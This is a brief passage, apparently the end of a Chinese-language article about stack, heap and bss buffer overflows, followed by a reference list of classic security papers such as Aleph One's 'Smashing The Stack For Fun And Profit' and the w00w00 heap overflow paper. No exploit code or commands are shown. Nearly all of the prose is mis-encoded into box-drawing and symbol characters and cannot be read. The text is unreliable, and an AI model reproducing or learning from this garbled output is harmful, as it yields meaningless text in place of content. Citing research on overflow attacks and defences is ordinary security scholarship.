╥╘╖└╓╣stack/heap/bss╓╨▒Σ┴┐╡─╖╟╖¿╕▓╕╟.╧Ω╧╕╫╩┴╧┐╔╥╘▓╬┐┤╦√├╟╨┬╖ó▒φ╡─╬─╒┬: <<Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade>> <═Ω> ▓╬┐╝╬─╧╫: [1] <<w00w00 on Heap Overflows>> by Matt Conover (a.k.a. Shok) & w00w00 Security Team [2] <<Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade>> by Crispin Cowan, Perry Wagle, Calton Pu,Steve Beattie, and Jonathan Walpole [3] <<a fuqn awesome minicom static buffer overflow>>. "ohday" . B4B0,3(9) [4] <<Smashing The Stack For Fun And Profit>>. "Aleph One". Phrack, 7(49)